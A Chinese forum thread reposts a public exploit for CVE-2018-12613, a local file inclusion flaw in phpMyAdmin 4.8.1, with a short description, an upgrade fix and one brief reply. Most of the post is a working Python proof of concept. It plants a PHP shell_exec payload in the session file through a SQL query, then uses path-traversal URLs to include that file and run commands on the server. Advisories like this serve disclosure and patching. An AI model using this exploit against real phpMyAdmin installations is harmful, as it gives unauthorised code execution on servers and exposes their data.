请选择 进入手机版 | 继续访问电脑版
查看: 1397|回复: 1

phpMyAdmin 4.8.1本地文件包含漏洞

[复制链接]
  • TA的每日心情

    7 小时前
  • 签到天数: 693 天

    [LV.9]以坛为家II

    发表于 2018-11-27 21:22:59 | 显示全部楼层 |阅读模式
    CVE-2018-12613

    # 1. Description:

    # An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).

    # 2. Proof of Concept:

    [AppleScript] 纯文本查看 复制代码
    import requests
     
    # input the target
    VALID_PHPMYADMIN_URL = ""
     
    # input a valid session (After authentification)
    VALID_PHPMYADMIN_SESSION = ""
     
    burp0_url = VALID_PHPMYADMIN_URL + "/import.php"
    burp0_cookies = {"phpMyAdmin": VALID_PHPMYADMIN_SESSION, "pma_lang": "en", "pmaUser-1": "%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D", "pmaAuth-1": "%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D"}
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
    burp0_data={"is_js_confirmed": "0", "token": "?[I568P@ei7B?OUd", "pos": "0", "goto": "server_sql.php", "message_to_show": "Your SQL query has been executed successfully.", "prev_sql_query": '', "sql_query": "select '<?php $output = shell_exec(\"ls -al; date; id;\");echo \"<pre>$output</pre>\";exit;?>'", "sql_delimiter": ";", "show_query": "1", "fk_checks": "0", "fk_checks": "1", "SQL": "Go", "ajax_request": "true", "ajax_page_request": "true", "_nocache": "1543255823534938840", "token": "?[I568P@ei7B?OUd"}
    requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
     
    print "While autentificated:"
     
    print "- Please check: " + VALID_PHPMYADMIN_URL + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_" + VALID_PHPMYADMIN_SESSION
     
    print "- Please check: " + VALID_PHPMYADMIN_URL + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_" + VALID_PHPMYADMIN_SESSION


    # 3. Solution:

    # Upgrade to version 4.8.2 or above.
    回复

    使用道具 举报

  • TA的每日心情
    开心
    昨天 12:18
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2018-12-5 20:57:55 | 显示全部楼层
    转发QQ里
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表